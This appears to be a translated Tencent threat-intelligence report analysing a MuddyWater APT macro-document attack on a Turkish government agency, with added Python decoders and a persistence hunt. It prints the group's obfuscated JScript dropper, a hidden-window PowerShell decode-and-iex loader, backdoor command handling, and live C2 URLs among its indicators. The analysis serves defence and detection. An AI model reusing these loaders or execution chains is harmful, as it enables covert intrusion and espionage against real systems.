0x1 Overview
Recently, the Tencent Yujian Threat Intelligence Center captured another attack sample from the MuddyWater APT group. Compared with the sample captured in March 2018, the target of this attack is still Turkey. Payload delivery once again relies on a macro document; the document embeds an icon file whose keyword is "mersin emniyet müdürlüğü". A search-engine query shows that this is the icon of a Turkish government department, so this was most likely a targeted attack against the relevant Turkish agency.
In terms of technique, the group uses heavily, repeatedly obfuscated PowerShell scripts throughout. Compared with the previous sample, some key trojan functions are now triggered by PowerShell scripts pushed down from the cloud (the C2), which greatly increases the difficulty of forensics for security organisations. As for C2 infrastructure, instead of the extravagant 517 C2 addresses used last time, this sample uses only 3. A detailed analysis of the attack sample follows.
(Attack flow diagram)
To summarise the technical characteristics of this new MuddyWater APT sample:
i. Target: a Turkish government department; the goal is to accept cloud-based control, download and drop backdoors, and obtain sensitive information;
ii. Uses heavily, repeatedly obfuscated PowerShell scripts;
iii. Some key functions are triggered by PowerShell scripts pushed down via cloud control, making the activity extremely covert and hard to capture;
iv. The captured sample uses only 3 C2 addresses;
v. Once the script runs, it sets up autostart at boot, decrypts the C2, creates a scheduled task, collects computer information and so on, then continuously polls the C2, waiting for and executing new commands.
0x2 Payload delivery
The background of the macro document is deliberately blurred, while the Turkish-language prompt to enable macros is unusually vivid. This is a typical social-engineering technique: it drives the victim, out of curiosity, to click the "Enable Content" button so that the trojan hidden in the document runs.
The VBA script in the decoy document is password-protected; a password prompt appears when viewing the macro. After cracking it we obtained the heavily obfuscated VBA script.
(VBA script)
The VBA contains 4 base64-encoded strings. After decoding, their contents are identical to OneDrive.dll, OneDrive.html and OneDrive.ini, which are dropped into the C:\ProgramData directory.
(Files dropped by the VBA)
The 4 base64-encoded strings in the VBA are shown below:
(base64 string 1)
(base64 string 2)
(base64 string 3)
(base64 string 4)
0x3 RAT analysis
OneDrive.html analysis
The content of this file is shown below. Like the command line mentioned earlier, "c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\OneDrive.html,OneDrive,1,", it exists to achieve persistence.
(Contents of OneDrive.html)
OneDrive.dll analysis
The content of this DLL is a JScript script, shown below.
<?xml version="1.0" encoding="utf-8"?>
<package>
<component>
<registration prog>
<script language="JScript"><![CDATA[
var a=['wq3DhcOQw6A=','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','w53DoMKQIgTCqj7Cg8Oh','wrTDm3Q=','w6luw4jDkSXCksOnw4TDuW1bw4BVIsO2w6zChQrClnE=','X8K0NsO9woVWdDPDpQIqw7hUZg==','wpjCk0MpPsOWw73DmDVD','w7MnTlPCqcKYd8O1Bg==','w7zCrsOR','KXrDkcKffQZwdkl1eBx2','wqbCh8OIwofCtCU='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1c4));var b=function(c,d){c=c-0x0;var e=a[c];if(b['mtNPvA']===undefined){(function(){var f;try{var g=Function('return (function() '+'{}.constructor("return this")( )'+');');f=g();}catch(h){f=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';f['atob']||(f['atob']=function(j){var k=String(j)['replace'](/=+$/,'');for(var l=0x0,m,n,o=0x0,p='';n=k['charAt'](o++);~n&&(m=l%0x4?m*0x40+n:n,l++%0x4)?p+=String['fromCharCode'](0xff&m>>(-0x2*l&0x6)):0x0){n=i['indexOf'](n);}return p;});}());var q=function(r,s){var t=[],u=0x0,v,w='',x='';r=atob(r);for(var y=0x0,z=r['length'];y<z;y++){x+='%'+('00'+r['charCodeAt'](y)['toString'](0x10))['slice'](-0x2);}r=decodeURIComponent(x);for(var A=0x0;A<0x100;A++){t[A]=A;}for(A=0x0;A<0x100;A++){u=(u+t[A]+s['charCodeAt'](A%s['length']))%0x100;v=t[A];t[A]=t[u];t[u]=v;}A=0x0;u=0x0;for(var B=0x0;B<r['length'];B++){A=(A+0x1)%0x100;u=(u+t[A])%0x100;v=t[A];t[A]=t[u];t[u]=v;w+=String['fromCharCode'](r['charCodeAt'](B)^t[(t[A]+t[u])%0x100]);}return w;};b['yrYnwx']=q;b['VjLgMC']={};b['mtNPvA']=!![];}var C=b['VjLgMC'][c];if(C===undefined){if(b['LYvtJw']===undefined){b['LYvtJw']=!![];}e=b['yrYnwx'](e,d);b['VjLgMC'][c]=e;}else{e=C;}return e;};var cm=b('0x0','1(n^');var w32ps=GetObject(b('0x1','@#1j'))[b('0x2','rZ%W')](b('0x3','CaVK'));w32ps[b('0x4','nOAS')]();w32ps[b('0x5','2*bW')]=0x0;var rtrnCode=GetObject(b('0x6','mISm'))[b('0x7','5Kh]')](b('0x8','q!&J'))[b('0x9','r@qO')](cm,b('0xa','1(n^'),w32ps,null);
]]></script>
</registration>
</component>
</package>
Simplified, the code in OneDrive.dll becomes the following; its purpose is to use PowerShell to execute the encrypted code in OneDrive.ini.
// PowerShell one-liner: read OneDrive.ini, decode its custom encoding (3 chars per chunk, base 52, offset 40), reverse, then iex the result
var cm='powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\OneDrive.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));'
// Win32_ProcessStartup with ShowWindow = 0 (SW_HIDE) so the PowerShell window is never shown
var w32ps = GetObject('winmgmts:')['Get']('Win32_ProcessStartup');
w32ps['SpawnInstance_']();
w32ps['ShowWindow'] = 0x0;
// Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation, ProcessId);
// in the obfuscated script these are b('0x7'), b('0x8'), b('0x9') and b('0xa'); the method name is reconstructed from the four-argument signature
var rtrnCode = GetObject('winmgmts:')['Get']('Win32_Process')['Create'](cm, 'c:\\', w32ps, null);
OneDrive.ini analysis
After decoding, the content of OneDrive.ini is the following PowerShell script.
iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('<base64 blob omitted>')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
The PowerShell script in OneDrive.ini first decompresses a base64-encoded script and then executes it. The decompressed PowerShell script is shown below (only part of it, as the code is very long); it has gone through several layers of heavy obfuscation.
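The loader in OneDrive.ini can be unpacked statically rather than executed. The following is an added example (not the report's code): it pulls the base64 argument out of the FromBase64String('...') call and inflates it with raw DEFLATE, which is what .NET's DeflateStream produces. The function names and the harmless inner script are my own constructions.

```python
# Added example (not from the original report): statically inflate the stage that
# OneDrive.ini wraps as FromBase64String -> DeflateStream -> ASCII -> iex, so it
# can be read instead of executed. The sample loader below is constructed here
# with zlib around a harmless script; it is not the real payload.
import base64
import zlib
from typing import Optional


def inflate_stage(b64_blob: str) -> str:
    """Undo [Convert]::FromBase64String + IO.Compression.DeflateStream.
    .NET DeflateStream is *raw* DEFLATE (no zlib header), hence wbits=-15."""
    raw = base64.b64decode(b64_blob)
    return zlib.decompress(raw, wbits=-zlib.MAX_WBITS).decode("ascii")


def extract_stage_from_oneliner(ps_line: str) -> Optional[str]:
    """Return the quoted base64 argument of FromBase64String('...'), or None."""
    marker = "FromBase64String('"
    start = ps_line.find(marker)
    if start < 0:
        return None
    start += len(marker)
    end = ps_line.find("'", start)           # base64 never contains a quote
    return ps_line[start:end] if end > start else None


def make_constructed_oneliner(inner_script: str) -> str:
    """Build a loader with the same shape as OneDrive.ini around a given script."""
    comp = zlib.compressobj(wbits=-zlib.MAX_WBITS)   # raw DEFLATE, like .NET
    data = comp.compress(inner_script.encode("ascii")) + comp.flush()
    blob = base64.b64encode(data).decode("ascii")
    return ("iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream "
            "($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('" + blob +
            "')))), [IO.Compression.CompressionMode]::Decompress)), "
            "[Text.Encoding]::ASCII)).ReadToEnd();")


# Constructed stand-in for the obfuscated second stage (harmless on purpose).
INNER = "Write-Host 'stage two'"
LOADER = make_constructed_oneliner(INNER)
```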
After several rounds of deobfuscation, the PowerShell script in OneDrive.ini finally yields the PowerShell version of the backdoor trojan.
(Final backdoor script)
Backdoor functionality analysis
Once the script runs, it sets up autostart at boot, decrypts the C2, creates a scheduled task, collects computer information and so on, then continuously polls the C2, waiting for and executing commands.
(Script entry point)
(Disabling Office security settings)
(Autostart entry and scheduled task)
(Collecting computer information)
(MD5 of the computer information used as the key)
(Decrypting the C2)
(HTTP POST)
(POST body)
(Requesting commands from the server)
Because the server returned abnormal data, the remaining functionality could only be partially analysed by reading the source code.
(Abnormal data returned by the server)
Command word upload: despite its name, it actually downloads a file.
Command word cmd: executes a cmd command.
Command word b64: executes a base64-encoded PowerShell script.
Command word muddy: first downloads a PowerShell script and stores it in the file c:\programdata\LSASS, then executes the script in that file. The base64 in the figure below decodes to "-exec Bypass -c $s=(get-content c:\programdata\LSASS);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));"
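Both OneDrive.ini and the LSASS file fetched by the muddy command use the same three-character, base-52 encoding that the PowerShell one-liners above decode. The following is an added example (not the report's code) that ports that decoder to Python so such a file can be read without executing it, plus a triage check for candidate files. encode_muddy and the sample script are my own constructions; the two-bytes-per-chunk packing in the encoder is an assumption, as the attackers' encoder is not on the page.

```python
# Added example (not from the original report): offline port of the PowerShell
# decoder that OneDrive.dll applies to OneDrive.ini and that the "muddy" command
# reuses for c:\programdata\LSASS, so the payload is recovered without iex.
# encode_muddy() is my own reference encoder, used only to build test input;
# the attackers' real encoder is not on the page.

ALPHABET_BASE = 40   # each char is (digit + 40): '(' .. '['
RADIX = 52           # one base-52 digit per char, three chars per chunk


def decode_muddy(encoded: str) -> str:
    """Mirror of: $v=($v*52)+([Int32][char]$s[$c]-40); every 3rd char, emit
    bytes low-first (zeros skipped); finally [array]::Reverse."""
    out, v = [], 0
    for i, ch in enumerate(encoded):
        v = v * RADIX + (ord(ch) - ALPHABET_BASE)
        if (i + 1) % 3 == 0:
            while v != 0:
                vv = v % 256
                if vv > 0:
                    out.append(chr(vv))
                # [Int32]($v/256) rounds half-to-even in PowerShell; Python's
                # round() does the same, and for ASCII payloads it equals floor.
                v = round(v / 256)
    return "".join(reversed(out))


def looks_like_muddy_ini(text: str) -> bool:
    """Triage check: only chars '(' .. '[' and a length divisible by 3."""
    return bool(text) and len(text) % 3 == 0 and all(
        ALPHABET_BASE <= ord(c) < ALPHABET_BASE + RADIX for c in text)


def encode_muddy(script: str) -> str:
    """Reference encoder (assumption: two ASCII bytes per 3-char chunk)."""
    r = script[::-1]  # the decoder reverses its output, so store reversed
    chunks = []
    for i in range(0, len(r), 2):
        lo = ord(r[i])
        hi = ord(r[i + 1]) if i + 1 < len(r) else 0
        v = lo + 256 * hi
        digits = (v // RADIX ** 2, (v // RADIX) % RADIX, v % RADIX)
        chunks.append("".join(chr(ALPHABET_BASE + d) for d in digits))
    return "".join(chunks)


# Constructed sample: a harmless command, not the real OneDrive.ini content.
SAMPLE_SCRIPT = "Get-Date | Out-File C:\\ProgramData\\demo.txt"
SAMPLE_INI = encode_muddy(SAMPLE_SCRIPT)
```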
0x4 Summary
Judging from MuddyWater's recent activity, the group consistently favours the combination of macro documents and PowerShell scripts. This sample shows that the group still holds a large number of compromised websites, used both to deliver decoys and to collect the spoils, while the truly core code is pushed down via cloud control to conceal its objectives. We therefore remind government, enterprise and other users not to open documents of unknown origin, and to install security software. If security software warns that an unfamiliar program has created an autostart entry, take it very seriously.
At present, the Tencent Yujie Advanced Threat Detection System can already detect and block the connection behaviour of this attack campaign. The Yujie system is a threat-intelligence and malicious-behaviour detection model built on the capabilities of Tencent's Anti-Virus Laboratory and on Tencent's massive cloud and endpoint data.
Relying on its two core capabilities, behaviour-based protection and intelligent models, the Yujie Advanced Threat Detection System efficiently detects unknown threats and, by analysing traffic at the boundary between the enterprise's internal and external networks, senses vulnerability exploitation and attacks. Deploying Yujie lets an enterprise detect malicious traffic in time, identify accesses to phishing URLs and C2 server addresses within its network, and protect network security.
0x5 IOCs
MD5:
5a42a712e3b3cfa1db32d9e3d832f8f1(doc)
6f1e84905f8d15269892026c0ab8d9a7(OneDrive.dll)
5a5b32e1ea053d5f76065cabe7e46851(OneDrive.html)
b96a0a71566a766589ba3c891f86ca3f(OneDrive.ini)
C2:
http://ektamservis.com/includes/main.php
http://www.cankayasrc.com/style/js/main.php
http://gtme.ae/font-awesome/css/main.php
Autostart entries and scheduled task:
HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run : OneDrives (autostart entry)
HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run : OneDrives (autostart entry)
"c:\\windows\\system32\\rundll32.exe advpack.dll,LaunchINFSection C:\\ProgramData\\OneDrive.html,OneDrive,1" (autostart entry content)
MicrosoftOneDrive (scheduled task name)
"c:\\windows\\system32\\rundll32.exe advpack.dll,LaunchINFSection C:\\ProgramData\\OneDrive.html,Defender,1," (scheduled task content)
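Added hunt logic (not from the report) for the persistence pattern listed above: rundll32.exe advpack.dll,LaunchINFSection pointed at a non-.inf file under ProgramData from a Run key or a scheduled task. The autorun records below are constructed, and the field layout and function names are my own.

```python
# Added example (not from the original report): flag Run-key values and
# scheduled-task actions that launch rundll32.exe advpack.dll,LaunchINFSection
# on a file under ProgramData whose extension is not .inf, as in this campaign.
import re

LAUNCHINF_RE = re.compile(
    r"rundll32(\.exe)?\s+advpack\.dll\s*,\s*LaunchINFSection\s+(?P<inf>[^,]+)",
    re.IGNORECASE)

# Constructed autorun records (source, name, command); the first two mirror the
# IOC list, the last two are benign look-alikes.
AUTORUNS = [
    ("HKCU\\...\\Run", "OneDrives",
     "c:\\windows\\system32\\rundll32.exe advpack.dll,LaunchINFSection "
     "C:\\ProgramData\\OneDrive.html,OneDrive,1"),
    ("ScheduledTask", "MicrosoftOneDrive",
     "c:\\windows\\system32\\rundll32.exe advpack.dll,LaunchINFSection "
     "C:\\ProgramData\\OneDrive.html,Defender,1,"),
    ("HKLM\\...\\Run", "SecurityHealth",
     "C:\\Windows\\system32\\SecurityHealthSystray.exe"),
    ("ScheduledTask", "DriverSetup",
     "rundll32.exe advpack.dll,LaunchINFSection C:\\Windows\\INF\\driver.inf,DefaultInstall,1"),
]


def assess(command):
    """Return the reasons a command resembles this campaign's persistence; [] = clean."""
    m = LAUNCHINF_RE.search(command)
    if not m:
        return []
    inf = m.group("inf").strip().strip('"').lower()
    reasons = ["rundll32 advpack.dll LaunchINFSection (INF execution via LOLBin)"]
    if "\\programdata\\" in inf:
        reasons.append("INF target under ProgramData")
    if not inf.endswith(".inf"):
        reasons.append("INF target with non-.inf extension (" + inf.rsplit(".", 1)[-1] + ")")
    return reasons


def hunt(records):
    """Return [(source, name, reasons)] for records with at least two reasons,
    so a legitimate LaunchINFSection call on a real .inf is not flagged."""
    hits = []
    for source, name, command in records:
        reasons = assess(command)
        if len(reasons) >= 2:
            hits.append((source, name, reasons))
    return hits
```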
The MuddyWater APT group engages in cyber-espionage; its victims are mainly located in Middle Eastern countries such as Pakistan, Saudi Arabia, the United Arab Emirates, Iraq and Turkey.
Since it was exposed in November 2017, the MuddyWater APT group has frequently launched attacks using PowerShell scripts as its backdoor, mainly targeting critical sectors such as government, finance, energy and telecommunications.
Related reading: "A summary of recent attack activity by the MuddyWater APT group"
http://www.freebuf.com/articles/web/165061.html